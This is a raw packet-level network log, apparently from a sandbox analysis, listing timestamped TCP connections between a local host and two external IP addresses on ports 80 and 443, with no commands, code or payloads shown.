Sep 9, 2024 17:34:32.008272886 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.012840033 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.012849092 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.013195992 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.013238907 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.022670984 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.063396931 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.435931921 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.436053991 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.436084986 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.436144114 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.436146021 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.436196089 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.437361002 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.437378883 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.437402964 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.437427998 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:32.469229937 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.474293947 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.474358082 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.474431038 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.479300976 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977746964 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977777958 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977803946 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977821112 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977834940 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977850914 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977850914 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.977869987 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977895021 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.977895021 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.977905989 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.977948904 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977966070 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977981091 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.977986097 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.978004932 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.978018045 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.982786894 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.982834101 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:32.982863903 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.982884884 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:32.984739065 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064366102 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064390898 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064407110 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064476967 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064498901 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064512968 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064527035 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064538002 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064543962 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064575911 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064590931 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064610004 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064625978 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.064646959 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.064659119 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.065361977 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.065409899 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.065418959 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.065437078 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.065443993 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.065454960 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.065469980 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.065473080 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.065488100 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.065505981 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.066231966 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.066263914 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.066279888 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.066287994 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.066309929 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.066318035 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.066353083 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.066369057 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.066402912 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.066402912 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.067053080 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.067090988 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.067106009 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.067111015 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.067122936 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.067140102 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.067152023 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.070990086 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.071053028 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.071063995 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.071105957 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151036978 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151077986 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151092052 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151103020 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151114941 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151202917 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151237011 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151252031 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151264906 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151274920 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151298046 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151321888 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151348114 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151359081 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151371002 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151401997 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151403904 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151417971 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151436090 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151439905 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151479006 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.151952982 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.151998043 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152005911 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152009964 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152031898 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152054071 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152098894 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152111053 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152121067 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152133942 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152142048 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152158022 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152174950 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152252913 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152265072 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152303934 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.152940989 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152966976 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152977943 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.152996063 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153014898 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153072119 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153084040 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153094053 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153107882 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153115988 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153131962 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153152943 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153178930 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153191090 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.153229952 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.153978109 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154020071 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154043913 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154059887 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154071093 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154099941 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154115915 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154130936 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154135942 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154176950 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154180050 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154206991 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154227972 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154236078 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154249907 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154268980 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154273033 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154309034 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.154863119 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.154912949 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.155431986 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:33.155493021 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:33.189233065 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:33.194259882 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:33.393502951 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:33.393558025 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:33.394002914 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:33.394031048 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:33.394087076 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:33.394462109 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:33.394473076 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.088363886 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.088598013 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.090167999 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.090178013 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.091598988 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.091604948 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.618859053 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.618937016 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.619075060 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.619190931 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.619210958 CEST  443          49168      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.619220018 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.619260073 CEST  49168        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.619549036 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:34.624840021 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:34.741194963 CEST  80           49167      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:34.741331100 CEST  49167        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:34.984163046 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:34.984245062 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.985131979 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:34.990114927 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:35.114413023 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.119508028 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.119594097 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.119810104 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.124789953 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636786938 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636804104 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636814117 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636832952 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636842966 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636852980 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636863947 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636873960 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636884928 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.636885881 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.636923075 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.636923075 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.636984110 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.637021065 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.641974926 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.642031908 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.642119884 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.642131090 CEST  80           49169      85.239.241.184   192.168.2.22
Sep 9, 2024 17:34:35.642160892 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.642414093 CEST  49169        80         192.168.2.22     85.239.241.184
Sep 9, 2024 17:34:35.643949032 CEST  80           49169      85.239.241.184   192.168.2.22
                                        Sep 9, 2024 17:34:35.644016027 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.724531889 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724566936 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724576950 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724594116 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724605083 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724610090 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.724616051 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724627972 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.724647045 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.724647045 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.724647045 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.724658012 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.725378036 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.725416899 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.725425959 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.725430012 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.725452900 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.725461006 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.725461960 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.725474119 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.725491047 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.725502014 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.726185083 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.726232052 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.726233959 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.726246119 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.726264000 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.726274014 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.726326942 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.726337910 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.726361990 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.726371050 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.727099895 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727111101 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727116108 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727133989 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727144957 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727159977 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.727174997 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.727834940 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727870941 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.727952957 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.727988005 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.729621887 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.729674101 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.729713917 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.729748011 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.812892914 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812911034 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812932968 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812952042 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812963009 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812973976 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812983990 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.812994957 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813008070 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813019037 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813015938 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813016891 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813016891 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813016891 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813030958 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813133001 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813133001 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813133001 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813133001 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813193083 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813222885 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813231945 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813235044 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813266993 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813266993 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813266993 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813345909 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813358068 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813366890 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813378096 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813400030 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813400984 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813446999 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813450098 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813461065 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813493967 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813494921 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813877106 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813888073 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813899040 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813936949 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813936949 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.813952923 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.813966990 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814003944 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814003944 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814165115 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814209938 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814220905 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814220905 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814253092 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814253092 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814294100 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814305067 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814315081 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814326048 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814344883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814344883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814378023 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814464092 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814476013 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814485073 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814495087 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814505100 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814515114 CEST804916985.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:35.814522028 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814522028 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814555883 CEST4916980192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:35.814557076 CEST4916980192.168.2.2285.239.241.184
